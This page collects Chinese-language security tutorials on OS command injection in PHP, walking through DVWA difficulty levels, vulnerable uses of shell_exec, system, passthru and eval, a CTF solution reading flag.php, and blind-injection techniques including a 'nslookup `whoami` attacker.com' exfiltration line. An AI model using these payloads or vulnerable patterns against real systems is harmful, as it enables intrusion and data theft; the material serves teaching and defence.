精华内容
下载资源
问答
  • 命令注入

    2019-09-22 21:11:02
    命令注入指的是,利用没有验证过的恶意命令或代码,对网站或服务器进行渗透攻击。 注入有很多种,并不仅仅只有SQL注入。比如: 命令注入(Command Injection)Eval 注入(Eval Inj...

    命令注入指的是,利用没有验证过的恶意命令或代码,对网站或服务器进行渗透攻击。

    注入有很多种,并不仅仅只有SQL注入。比如:

    • 命令注入(Command Injection)
    • Eval 注入(Eval Injection)
    • 客户端脚本攻击(Script Insertion)
    • 跨网站脚本攻击(Cross Site Scripting, XSS)
    • SQL 注入攻击(SQL injection)
    • 动态函数注入攻击(Dynamic Variable Evaluation)
    • 序列化注入&对象注入

    步骤2:漏洞代码审计

    在之前常见危险函数一课我们已经说过,在PHP中常用到以下几个函数来执行外部命令:

    system
    exec
    passthru
    shell_exec

    所以接下来,要寻找哪个文件使用了这几个函数,并进行分析。

    我们对函数名进行搜索,右键点击www目录,在弹出来的菜单上选择find in folder,这个是查找整个文件夹的意思,然后我们在下方弹出的框内输入第一个敏感函数:system,点击Find,这时,编辑器就会查找WWW目录下所有内容里面有system的文件。

    Alt text

    可以看到,在variables文件里有system函数,但它的功能只是让我们自定义网络,对本次试验无意义,因此我们查看下一个函数exec

    用同样的方法搜索exec函数:

    Alt text

    它出现在在admin目录下的ping.php文件中,我们打开admin目录下的ping.php文件进行查看:

    Alt text

    打开文件后可以看到,只有19到30行左右为PHP代码,其他均为HTML,因此核心代码应该为第19行到30行,如下:

    1. <?php
    2. if( isset( $_POST[ 'submit' ] ) ) {
    3. $target = $_POST[ 'target' ];
    4. if (stristr(php_uname('s'), 'Windows NT')) {
    5. $cmd = 'ping ' . $target;
    6. } else {
    7. $cmd = 'ping -c 3 ' . $target;
    8. }
    9. $res = shell_exec( $cmd );
    10. echo "<br /><pre>$cmd\r\n".iconv('GB2312', 'UTF-8',$res)."</pre>";
    11. }
    12. ?>

    这段代码的功能是,使用ping命令,ping用户输入的ip。

    接下来大概分析一下这段代码的大意:

    首先通过isset函数判断是否为POST提交过来的值,接下来将POST过来的值传递给target变量,但是没有经过任何的过滤,接下来使用if判断系统是否为windows,如果是则给cmd赋值为ping target,如果不是则赋值为ping -c 3 target。最后使用shell_exec执行cmd。

    我们从上面的代码中可以得到两点可能产生漏洞的地方:

    >* POST过来的数据,没有经过任何的过滤。 >* 使用shell_exec函数执行了我们传递过来的POST值。

    这便是漏洞所在的地方,我们可以在ip后面添加|符,让它执行完ping命令后,继续执行我们在|符号后添加的字符,其中|:是or的意思,执行完ping命令,因为有|的存在,系统就会继续执行后面的命令。

    漏洞修复

    我们不仅要能发现这个漏洞,还要能对这个漏洞进行修复,那么如何修复呢?答案当然是过滤POST过来的变量,我们可以用很多方法对POST变量进行过滤。比如使用正则表达式来限制、或者首先判断POST过来的值是否为ip等等。

    1. <?php
    2. if( isset( $_POST[ 'submit' ] ) ) {
    3. $target = $_POST[ 'target' ];
    4. if(preg_match('/^(?=^.{3,255}$)[a-zA-Z0-9][-a-zA-Z0-9]{0,62}(\.[a-zA-Z0-9][-a-zA-Z0-9]{0,62})+$|^((25[0-5]|2[0-4]\d|[01]?\d\d?)($|(?!\.$)\.)){4}$/',$target)){
    5. if (stristr(php_uname('s'), 'Windows NT')) {
    6. $cmd = 'ping ' . $target;
    7. } else {
    8. $cmd = 'ping -c 3 ' . $target;
    9. }
    10. $res = shell_exec( $cmd );
    11. echo "<br /><pre>$cmd\r\n".iconv('GB2312', 'UTF-8',$res)."</pre>";
    12. }
    13. else{
    14. echo "IP is error";
    15. }
    16. }
    17. ?>

    使用正则表达式来对用户输入的POST值进行过滤验证,这样就可以避免恶意代码的执行。

    展开全文
  • 命令注入漏洞注:命令注入漏洞的分析,及含有命令注入漏洞的函数解析含有命令注入漏洞的函数:system()、exec()、passthru()、shell_exec()、``(与shell_exec()功能相同)一、 基于DVWA环境的命令注入漏洞(shell_exec...

    命令注入漏洞

    注:命令注入漏洞的分析,及含有命令注入漏洞的函数解析

    含有命令注入漏洞的函数:system()、exec()、passthru()、shell_exec()、``(与shell_exec()功能相同)

    一、 基于DVWA环境的命令注入漏洞(shell_exec)

    1、 函数用法

    String shell_exec(string command)

    command 要执行的命令

    2、 low级别

    源码:

    if( isset( $_POST[ 'Submit' ] ) ) {

    // Get input

    $target = $_REQUEST[ 'ip' ];

    // Determine OS and execute the ping command.

    if( stristr( php_uname( 's' ), 'Windows NT' ) ) {

    // Windows

    $cmd = shell_exec( 'ping ' . $target );

    }

    else {

    // *nix

    $cmd = shell_exec( 'ping -c 4 ' . $target );

    }

    // Feedback for the end user

    echo "

    {$cmd}
    ";

    }

    ?>

    源码分析:

    函数首先判断环境下的系统,如果是win则执行第一个命令,若是linux执行的命令加上-c选项,以为linux中ping命令是一直执行的。只有加了-c指定发送的跳数才能停止。

    可以看到在接收用户输入的地方,对用户的输入没有做任何的处理。不难看出这就是一个典型的命令注入漏洞。而且孩子是最轻易。

    我们正常测试一下:

    bd8af822da24c329d65e7cb97f7c567b.png

    可以看到,正常返回的是ping返回的数据。

    我们通过这个命令执行漏洞进行测试一下:

    构造我们的语句:10.39.1.4 | net user

    解释: | 的意思是前面命令的输出结果作为后面命令的输入。

    net user 查看当前系统中存在哪些用户

    测试:

    983e43b1e86404b90df8d8f849806385.png

    可以看到当前系统中存在三个用户。如果作为×××去利用的话就可以使用命令去创建一个用户。就不在演示

    漏洞分析:不处理用户的任何输入就直接执行函数中的命令。

    知识扩展:

    ; - 分号在linux命令执行的时候,可以直接执行几条命令,命令与命令之间用分号隔开。

    & 前面的命令执行后接着执行候命的命令

    && 前面的命令执行成功后才可以执行下面的命令

    | 前面的命令输出结果最为后面命令输入的内容

    || 前面的命令执行失败后才会执行后面的命令

    3、medium级别

    源码:

    if( isset( $_POST[ 'Submit' ] ) ) {

    // Get input

    $target = $_REQUEST[ 'ip' ];

    // Set blacklist

    $substitutions = array(

    '&&' => '',

    ';' => '',

    );

    // Remove any of the charactars in the array (blacklist).

    $target = str_replace( array_keys( $substitutions ), $substitutions, $target );

    // Determine OS and execute the ping command.

    if( stristr( php_uname( 's' ), 'Windows NT' ) ) {

    // Windows

    $cmd = shell_exec( 'ping ' . $target );

    }

    else {

    // *nix

    $cmd = shell_exec( 'ping -c 4 ' . $target );

    }

    // Feedback for the end user

    echo "

    {$cmd}
    ";

    }

    ?>

    源码分析:

    Str_replace()函数,以其他字符替换字符串中的一些字符(区分大小写)。

    $target = str_replace( array_keys( $substitutions ), $substitutions, $target );将用户输入的内容,含有&&或;的替换为空。

    其他的部分基本和low相差不大。

    这里的源码对用户的输入进行了初步的过滤,过滤掉了一些能够同时执行命令的符号,但是我们知道,拥有同样作用的符号不止&&和;。所以依然可以进行命令注入。

    命令注入测试:

    构造语句: 10.39.1.4 & net user

    & 前面命令执行后接着执行后面的命令

    测试:

    1177c13084e63088d719a209d754a783.png

    依然获得了执行的结果

    漏洞分析:此级别下的源码虽然对用户的输入设置了过滤,但是没有将特殊符号过滤完全,仅仅设置黑名单是不够的,你不知道用户会输入什么,造成有心者亦可以利用此漏洞。

    4、 high级别

    源码:

    if( isset( $_POST[ 'Submit' ] ) ) {

    // Get input

    $target = trim($_REQUEST[ 'ip' ]);

    // Set blacklist

    $substitutions = array(

    '&' => '',

    ';' => '',

    '| ' => '',

    '-' => '',

    '$' => '',

    '(' => '',

    ')' => '',

    '`' => '',

    '||' => '',

    );

    // Remove any of the charactars in the array (blacklist).

    $target = str_replace( array_keys( $substitutions ), $substitutions, $target );

    // Determine OS and execute the ping command.

    if( stristr( php_uname( 's' ), 'Windows NT' ) ) {

    // Windows

    $cmd = shell_exec( 'ping ' . $target );

    }

    else {

    // *nix

    $cmd = shell_exec( 'ping -c 4 ' . $target );

    }

    // Feedback for the end user

    echo "

    {$cmd}
    ";

    }

    ?>

    源码分析:

    这个级别的源码和medium级别的源码相差不大,只是将更多的符号加入黑名单。

    通过这样的确实能够有效的防御之前的诸多思路。

    测试:

    输入10.39.1.4 | net user

    3d139579de8f87f3e7b7841d90373067.png

    已经不能用那些方法了。具体的利用我也没有找到合适的方法。

    漏洞分析:只是做黑名单的话,总是不够安全的,只要黑名单不够完整,就不是很安全。即使你认为名单已经很完整了。可能还有你不知道的存在可以利用。

    5、impossible级别

    源码:

    if( isset( $_POST[ 'Submit' ] ) ) {

    // Check Anti-CSRF token

    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input

    $target = $_REQUEST[ 'ip' ];

    $target = stripslashes( $target );

    // Split the IP into 4 octects

    $octet = explode( ".", $target );

    // Check IF each octet is an integer

    if( ( is_numeric( $octet[0] ) ) && ( is_numeric( $octet[1] ) ) && ( is_numeric( $octet[2] ) ) && ( is_numeric( $octet[3] ) ) && ( sizeof( $octet ) == 4 ) ) {

    // If all 4 octets are int's put the IP back together.

    $target = $octet[0] . '.' . $octet[1] . '.' . $octet[2] . '.' . $octet[3];

    // Determine OS and execute the ping command.

    if( stristr( php_uname( 's' ), 'Windows NT' ) ) {

    // Windows

    $cmd = shell_exec( 'ping ' . $target );

    }

    else {

    // *nix

    $cmd = shell_exec( 'ping -c 4 ' . $target );

    }

    // Feedback for the end user

    echo "

    {$cmd}
    ";

    }

    else {

    // Ops. Let the user name theres a mistake

    echo '

    ERROR: You have entered an invalid IP.
    ';

    }

    }

    // Generate Anti-CSRF token

    generateSessionToken();

    源码分析:

    Explode()函数,将字符串变为数组。这里就是将我们输入的ip,变成数组

    然后判断数组的前四组数是否为数字,并且数组中有四个对象。不满足就会报错提醒。也就是说这里只允许你输入四组数字。

    若果判断为true的话,就会再将这四组数通过点连接起来再就行ping命令。

    就不测试了,这样的源码已经杜绝了你的所有命令注入×××。

    二、eval()函数造成的命令注入漏洞

    1、函数用法

    eval(phpcode)

    Phpcode 规定要计算的php代码。通常用分号结束每句代码的执行。

    2、环境源码:

    $var = "var";

    if(isset($_GET["name"])){

    $arg = $_GET["name"];

    eval("\$var=$arg;");

    echo "\$var = ".$var;

    }

    ?>

    构造语句:

    name=phpinfo()

    测试效果:

    11736d93a8d08cca9b740242ff6990b1.png

    3、 ctf题目实例

    题目地址bugku中的本地包含:http://120.24.86.145:8003/

    题目解析:

    源码:

    include "flag.php";

    $a = @$_REQUEST['hello'];

    eval( "var_dump($a);");

    show_source(__FILE__);

    ?>

    构造语句:

    Hello = file(‘flag.php’)

    解析,当参数接收到的构造的语句的时候,代码就会变为

    Eval(var_dump(file(‘flag.php’)))

    Eval函数,执行函数体没的php代码;file()函数把整个文件读到一个数组中。Var_dump()函数 输出。

    所以执行结果就是将flag.php中的内容以数组的形式输出出来。

    1f571c03f8cbfcb631bfe2acf97cf479.png

    得到flag

    三、system()函数造成的漏洞

    1、函数用法:

    System(string command,int &return_var)

    Command 要执行的命令

    Return_var 存放命令的执行后的状态值

    2、环境源码:

    $cmd = $_GET['cmd'];

    if(isset($cmd)){

    echo system("dir".$cmd);

    }

    ?>

    构造语句:

    Cmd=| net user

    测试:

    96c8441ba0490965b128b6115f89a2d8.png

    通过漏洞我们获得了系统中存在哪些用户,同样的我们也可以通过这样的方法在系统中创建我们自己的用户。并可以加入到管理员组中。这里就不在说了。

    四、shell_exec()函数造成的漏洞

    1、函数用法:

    shell_exec(string command)

    command 要执行的命令

    2、环境源码:

    $cmd = $_GET['cmd'];

    if(isset($cmd)){

    echo "

    ";

    echo shell_exec("dir".$cmd);

    echo "

    ";

    }

    ?>

    4、 测试:

    构造语句: | net user

    de458d5abdefc45ca0600f7ee649d165.png

    实现方法和上一个函数是一样的。同样的函数还有exec()和符号

    五、passthru()函数造成的漏洞

    1、函数用法:

    void passthru (string command, int &return_var)

    command 要执行的命令

    return_var 存放执行命令后的状态值

    同 exec() 函数类似, passthru() 函数 也是用来执行外部命令(command)的。 当所执行的 Unix 命令输出二进制数据, 并且需要直接传送到浏览器的时候, 需要用此函数来替代 exec() 或 system() 函数。

    2、环境源码:

    $cmd = $_GET['cmd'];

    if(isset($cmd)){

    echo passthru($cmd);

    }

    ?>

    3、测试

    构造语句 cmd=net user

    753396f8bf9e31cab0ce029ebfef4a26.png

    获得用户列表

    六、总结

    总结以上所有函数漏洞造成的命令注入漏洞,每一个例子都是因为没有对用户的输入进行处理。在防御漏洞的时候,一定明白一个道理,所有用户的输入都是有害的。所有的输入都是不值得相信的。

    展开全文
  • 在本文中,我将讲述什么是系统命令注入以及如何检测和利用系统注入漏洞。并且会罗列一些针对不同操作系统比较有用的攻击命令和技术。最后则将讲述如何阻止系统命令注入攻击。什么是系统命令注入?操作系统命令注入...

    在本文中,我将讲述什么是系统命令注入以及如何检测和利用系统注入漏洞。并且会罗列一些针对不同操作系统比较有用的攻击命令和技术。最后则将讲述如何阻止系统命令注入攻击

    196b1fdbdc84f33972562623a3624566.png

    什么是系统命令注入?

    操作系统命令注入(通常也称为脚本注入(Shell Injection))是一种web安全漏洞。攻击者可以利用其在运行应用的服务器执行任意操作系统命令。典型的后果是完全破坏应用程序及其所有数据。通常,攻击者还能利用这种漏洞破坏托管该应用基础设施的其它部分,并利用其它服务对该被攻击服务的信任关系将攻击转移到组织内的其他系统

    执行任意命令

    考虑一个购物应用程序,该应用程序使用户可以查看特定商店中某商品是否有库存。该信息可通过如下URL访问到:

    https://insecure-website.com/stockStatus?productID=381&storeID=29

    为了提供库存信息,通常的做法可能都是去查询数据库之类的存储系统。但是不巧,该服务整体架构比较老旧,为了拿到库存信息,应用程序必须查询各种旧系统。由于历史原因,该功能是通过使用productIDstoreID作为参数调用shell命令来实现的:

    stockreport.pl 381 29

    这个脚本会针对给定productIDstoreID来查询库存信息并返回给用户。

    而由于该服务并没有进行任何的命令注入的防护,所以攻击者可以通过提交下面这样的查询字符串来执行任意命令:

    & echo aiwefwlguh &

    如果这个参数是作为productID传入的,那么最终执行的命令会是:

    stockreport.pl & echo aiwefwlguh & 29

    这个echo命令只会导致提供的字符串回显到输出,这在用来测试某些类型的注入非常有用。字符串是shell命令分隔符,所以最终被执行的是三段独立的指令。所以,最终输出给用户的将可能会是:

    Error - productID was not provided
    aiwefwlguh
    29: command not found

    这三行输出可以证明:

    • 最初的 stockreport.pl 并没有按照自己预期的参数执行,所以它输出了错误的结果

    • 被注入的 echo 指令被执行了,并且提供给它的参数回显出来了。

    • 参数29被当做命令去解析,所以导致了一个错误。

    通常,将附加命令分隔符放置在注入命令之后是很有用的,因为这会将注入命令与注入点后面的内容分开。这减少了注入的命令被阻止执行的可能性。

    注意:以上只是比较简单的例子,很多系统命令注入漏洞并不会直接把结果返回给攻击者,后面会讲。一些有用的命令

    当你已经确定出某个应用存在命令注入漏洞后,通常可以执行一些初始命令来获取有关被你攻击的系统的信息。以下是在Linux和Windows平台上有用的一些命令:

    说明LinuxWindows
    当前用户信息whoamiwhoami
    操作系统信息uname -aver
    网络配置ifconfigipconfig /all
    网络连接netstat -annetstat -an
    运行的进程ps -eftasklist

    系统命令盲注攻击

    命令注入中的很多case都是盲注漏洞。什么意思呢?就是说虽然命令确实被注入了,但是它并不会像上面的例子那样直接将结果返回回来。盲注漏洞仍然可以被利用,只是需要不同的技术。

    假设一个Web站点运行用户给他们提交反馈。用户输入他们的邮箱以及反馈内容。服务端应用给管理员生成一封包含反馈内容的邮件。这个应用是通过调用mail实现这个功能的,例如:

    mail -s "This site is great" -aFrom:peter@normal-user.net feedback@vulnerable-website.com

    假设 mail指令的内容并不会直接通过HTTP响应返回给提交者,那么使用 echo 来检测是否可以注入的话就不太可行了。这种情况下,可以使用其它的技术来检查和利用漏洞。

    使用时间延时检测命令盲注

    可以通过尝试注入一个会导致响应时延的命令并对比注入前后响应的时间来确认注入的命令是否被执行。ping 指令非常适合干这个,因为它允许你指定发送ICMP包,而这会消耗时间,比如:

    & ping -c 10 127.0.0.1 &

    这个指令会导致应用会ping 一下127.0.0.1这个回环地址,持续10s。

    通过重定向输出利用命令盲注

    另外一种方式是,你可以将命令的输出重定向到应用根目录下的某个文件,这样你可以直接在浏览器获取这个文件。例如,如果应用程序的静态资源存放在位于服务目录/var/www/static下,那么你可以通过如下指令将命令输出写入这个目录下的文件:

    & whoami > /var/www/static/whoami.txt &

    >会将whoami指令的输出写入/var/www/static/whoami.txt这个文件中,那这样你就可以直接通过浏览器URL https://vulnerable-website.com/whoami.txt 访问到了。

    使用out-of-band(OAST)网络技术利用命令盲注

    另外一种方式就是,你可以通过注入一个能够与你自己控制的服务进行交互的命令来验证。比如:

    & nslookup attacker.com &

    这个注入使用了nslookup命令来查询指定域名的DNS。攻击者可以监视是否发生了指定的查找,从而检测到命令成功注入与否。

    这种注入方式还提供了一种从注入的命令中提取输出的简便方法:

    & nslookup `whoami` attacker.com &

    这个注入命令会导致被攻击服务携带信息向攻击者控制的服务发起DNS查询。

    系统命令注入常见方式

    有很多种shell元字符可以用来实现系统命令注入。有许多字符用作命令分隔符,使命令可以链接在一起。以下命令分隔符在Windows和基于Unix的系统上均可使用:

    • &

    • &&

    • |

    • ||

    下面这几种只能运行在基于Unix的系统:

    • ;

    • 换行 (0x0a or \n)

    在基于Unix的系统上,您还可以使用反引号美元字符在原始命令中内嵌执行注入命令:

    • some injected command

    • $( some injected command )

    注意,不同的shell元字符的行为具有细微差异,这些行为可能会影响它们是否在某些情况下起作用,以及它们是在有回显输出的场景起作用还是只能通过盲注的方式起作用。

    有时,您控制的输入会出现在原始命令的引号中。在这种情况下,需要先使用引号终止上下文(使用单引号'或双引号''),然后再使用适当的shell元字符来插入新命令。

    如何阻止系统命令注入攻击?

    目前为止,最为有效的阻止命令注入的手段就是不以系统命令的方式执行外部输入。不执行就不会有风险,有很多种可以替代通过执行命令完成工作的手段。

    但是如果你这个不可避免的非得用执行命令的方式来完成某个工作,唯一的方式就是对输入执行强校验,一些校验case如下:

    • 使用白名单对指令校验

    • 校验输入是否是数字

    • 校验输入是否是基本的字符,没有空格或者其他字符。

    切勿尝试通过转义shell元字符来清理输入。实际上,这太容易出错,容易被熟练的攻击者绕开。

    参考

    https://portswigger.net/web-security/os-command-injection

    展开全文
  • 命令注入漏洞 注:命令注入漏洞的分析,及含有命令注入漏洞的函数解析 含有命令注入漏洞的函数:system()、exec()、passthru()、shell_exec()、``(与shell_exec()功能相同) 一、 基于DVWA环境的命令注入漏洞...

    命令注入漏洞

    注:命令注入漏洞的分析,及含有命令注入漏洞的函数解析

    含有命令注入漏洞的函数:system()、exec()、passthru()、shell_exec()、``(与shell_exec()功能相同)

    一、 基于DVWA环境的命令注入漏洞(shell_exec)

    1、 函数用法
    String shell_exec(string command)
    command 要执行的命令
    2、 low级别
    源码:

    
    <?php
    
    if( isset( $_POST[ 'Submit' ]  ) ) {
        // Get input
        $target = $_REQUEST[ 'ip' ];
    
        // Determine OS and execute the ping command.
        if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
            // Windows
            $cmd = shell_exec( 'ping  ' . $target );
        }
        else {
            // *nix
            $cmd = shell_exec( 'ping  -c 4 ' . $target );
        }
    
        // Feedback for the end user
        echo "<pre>{$cmd}</pre>";
    }
    
    ?>

    源码分析:
    函数首先判断环境下的系统,如果是win则执行第一个命令,若是linux执行的命令加上-c选项,以为linux中ping命令是一直执行的。只有加了-c指定发送的跳数才能停止。
    可以看到在接收用户输入的地方,对用户的输入没有做任何的处理。不难看出这就是一个典型的命令注入漏洞。而且孩子是最轻易。
    我们正常测试一下:
    php命令注入函数及dvwa命令注入实践
    可以看到,正常返回的是ping返回的数据。
    我们通过这个命令执行漏洞进行测试一下:
    构造我们的语句:10.39.1.4 | net user
    解释: | 的意思是前面命令的输出结果作为后面命令的输入。
    net user 查看当前系统中存在哪些用户
    测试:
    php命令注入函数及dvwa命令注入实践
    可以看到当前系统中存在三个用户。如果作为×××去利用的话就可以使用命令去创建一个用户。就不在演示
    漏洞分析:不处理用户的任何输入就直接执行函数中的命令。

    知识扩展:
    ; - 分号在linux命令执行的时候,可以直接执行几条命令,命令与命令之间用分号隔开。
    & 前面的命令执行后接着执行候命的命令
    && 前面的命令执行成功后才可以执行下面的命令
    | 前面的命令输出结果最为后面命令输入的内容
    || 前面的命令执行失败后才会执行后面的命令

    3、medium级别
    源码:

    <?php
    
    if( isset( $_POST[ 'Submit' ]  ) ) {
        // Get input
        $target = $_REQUEST[ 'ip' ];
    
        // Set blacklist
        $substitutions = array(
            '&&' => '',
            ';'  => '',
        );
    
        // Remove any of the charactars in the array (blacklist).
        $target = str_replace( array_keys( $substitutions ), $substitutions, $target );
    
        // Determine OS and execute the ping command.
        if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
            // Windows
            $cmd = shell_exec( 'ping  ' . $target );
        }
        else {
            // *nix
            $cmd = shell_exec( 'ping  -c 4 ' . $target );
        }
    
        // Feedback for the end user
        echo "<pre>{$cmd}</pre>";
    }
    
    ?>

    源码分析:
    Str_replace()函数,以其他字符替换字符串中的一些字符(区分大小写)。
    $target = str_replace( array_keys( $substitutions ), $substitutions, $target );将用户输入的内容,含有&&或;的替换为空。
    其他的部分基本和low相差不大。
    这里的源码对用户的输入进行了初步的过滤,过滤掉了一些能够同时执行命令的符号,但是我们知道,拥有同样作用的符号不止&&和;。所以依然可以进行命令注入。
    命令注入测试:
    构造语句: 10.39.1.4 & net user
    & 前面命令执行后接着执行后面的命令
    测试:
    php命令注入函数及dvwa命令注入实践
    依然获得了执行的结果

    漏洞分析:此级别下的源码虽然对用户的输入设置了过滤,但是没有将特殊符号过滤完全,仅仅设置黑名单是不够的,你不知道用户会输入什么,造成有心者亦可以利用此漏洞。

    4、 high级别
    源码:
    <?php

    if( isset( $_POST[ 'Submit' ] ) ) {
    // Get input
    $target = trim($_REQUEST[ 'ip' ]);

    // Set blacklist
    $substitutions = array(
        '&'  => '',
        ';'  => '',
        '| ' => '',
        '-'  => '',
        '$'  => '',
        '('  => '',
        ')'  => '',
        '`'  => '',
        '||' => '',
    );
    
    // Remove any of the charactars in the array (blacklist).
    $target = str_replace( array_keys( $substitutions ), $substitutions, $target );
    
    // Determine OS and execute the ping command.
    if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
        // Windows
        $cmd = shell_exec( 'ping  ' . $target );
    }
    else {
        // *nix
        $cmd = shell_exec( 'ping  -c 4 ' . $target );
    }
    
    // Feedback for the end user
    echo "<pre>{$cmd}</pre>";

    }

    ?>

    源码分析:
    这个级别的源码和medium级别的源码相差不大,只是将更多的符号加入黑名单。
    通过这样的确实能够有效的防御之前的诸多思路。
    测试:
    输入10.39.1.4 | net user
    php命令注入函数及dvwa命令注入实践
    已经不能用那些方法了。具体的利用我也没有找到合适的方法。

    漏洞分析:只是做黑名单的话,总是不够安全的,只要黑名单不够完整,就不是很安全。即使你认为名单已经很完整了。可能还有你不知道的存在可以利用。

    5、impossible级别
    源码:

    
    <?php
    if( isset( $_POST[ 'Submit' ]  ) ) {
        // Check Anti-CSRF token
        checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
        // Get input
        $target = $_REQUEST[ 'ip' ];
        $target = stripslashes( $target );
    
        // Split the IP into 4 octects
        $octet = explode( ".", $target );
    
        // Check IF each octet is an integer
        if( ( is_numeric( $octet[0] ) ) && ( is_numeric( $octet[1] ) ) && ( is_numeric( $octet[2] ) ) && ( is_numeric( $octet[3] ) ) && ( sizeof( $octet ) == 4 ) ) {
            // If all 4 octets are int's put the IP back together.
            $target = $octet[0] . '.' . $octet[1] . '.' . $octet[2] . '.' . $octet[3];
    
            // Determine OS and execute the ping command.
            if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
                // Windows
                $cmd = shell_exec( 'ping  ' . $target );
            }
            else {
                // *nix
                $cmd = shell_exec( 'ping  -c 4 ' . $target );
            }
    
            // Feedback for the end user
            echo "<pre>{$cmd}</pre>";
        }
        else {
            // Ops. Let the user name theres a mistake
            echo '<pre>ERROR: You have entered an invalid IP.</pre>';
        }
    }
    
    // Generate Anti-CSRF token
    generateSessionToken();

    源码分析:
    Explode()函数,将字符串变为数组。这里就是将我们输入的ip,变成数组
    然后判断数组的前四组数是否为数字,并且数组中有四个对象。不满足就会报错提醒。也就是说这里只允许你输入四组数字。
    若果判断为true的话,就会再将这四组数通过点连接起来再就行ping命令。
    就不测试了,这样的源码已经杜绝了你的所有命令注入×××。

    二、eval()函数造成的命令注入漏洞

    1、函数用法
    eval(phpcode)
    Phpcode 规定要计算的php代码。通常用分号结束每句代码的执行。
    2、环境源码

    <?php
    $var = "var";
    if(isset($_GET["name"])){
        $arg = $_GET["name"];
        eval("\$var=$arg;");
        echo "\$var = ".$var;
    }
    
    ?>

    构造语句:

    name=phpinfo()

    测试效果:
    php命令注入函数及dvwa命令注入实践
    3、 ctf题目实例
    题目地址bugku中的本地包含:http://120.24.86.145:8003/
    题目解析:
    源码:

    <?php 
        include "flag.php"; 
        $a = @$_REQUEST['hello']; 
        eval( "var_dump($a);"); 
        show_source(__FILE__); 
    ?>

    构造语句:
    Hello = file(‘flag.php’)
    解析,当参数接收到的构造的语句的时候,代码就会变为
    Eval(var_dump(file(‘flag.php’)))
    Eval函数,执行函数体没的php代码;file()函数把整个文件读到一个数组中。Var_dump()函数 输出。
    所以执行结果就是将flag.php中的内容以数组的形式输出出来。
    php命令注入函数及dvwa命令注入实践
    得到flag

    三、system()函数造成的漏洞

    1、函数用法:
    System(string command,int &return_var)
    Command 要执行的命令
    Return_var 存放命令的执行后的状态值
    2、环境源码:

    <?php
    $cmd = $_GET['cmd'];
    if(isset($cmd)){
        echo system("dir".$cmd);
    }
    ?>

    构造语句:
    Cmd=| net user

    测试:
    php命令注入函数及dvwa命令注入实践
    通过漏洞我们获得了系统中存在哪些用户,同样的我们也可以通过这样的方法在系统中创建我们自己的用户。并可以加入到管理员组中。这里就不在说了。

    四、shell_exec()函数造成的漏洞

    1、函数用法:
    shell_exec(string command)
    command 要执行的命令
    2、环境源码:

    <?php
    $cmd = $_GET['cmd'];
    if(isset($cmd)){
        echo "<h3>";
        echo shell_exec("dir".$cmd);
        echo "<h3>";
    }
    ?>

    4、 测试:
    构造语句: | net user

    php命令注入函数及dvwa命令注入实践
    实现方法和上一个函数是一样的。同样的函数还有exec()和符号

    五、passthru()函数造成的漏洞
    1、函数用法:
    void passthru (string command, int &return_var)
    command 要执行的命令
    return_var 存放执行命令后的状态值

    同 exec() 函数类似, passthru() 函数 也是用来执行外部命令(command)的。 当所执行的 Unix 命令输出二进制数据, 并且需要直接传送到浏览器的时候, 需要用此函数来替代 exec() 或 system() 函数。
    2、环境源码:

    <?php
    $cmd = $_GET['cmd'];
    if(isset($cmd)){
    
        echo passthru($cmd);
    }
    ?>

    3、测试
    构造语句 cmd=net user
    php命令注入函数及dvwa命令注入实践
    获得用户列表

    六、总结

            总结以上所有函数漏洞造成的命令注入漏洞,每一个例子都是因为没有对用户的输入进行处理。在防御漏洞的时候,一定明白一个道理,所有用户的输入都是有害的。所有的输入都是不值得相信的。

    转载于:https://blog.51cto.com/12332766/2151859

    展开全文
  • 原标题:PHP安全:系统命令注入系统命令注入攻击(OS Command Injection)是指恶意攻击者通过非正常手段提交shell命令,通过PHP函数进行系统调用执行,以达到恶意攻击系统的目的。1、易发生命令注入的函数为了方便处理...
  • 最近做测试的时候,发现不同平台/语言下命令注入的结果会有一定的不同,于是尝试对命令注入的成因做了一个更细致的探索。语言实现PHPPHP命令执行的函数很多,其中大部分函数的实现都在 php-src/ext/standard/exec.c ...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 7,612
精华内容 3,044
关键字:

命令注入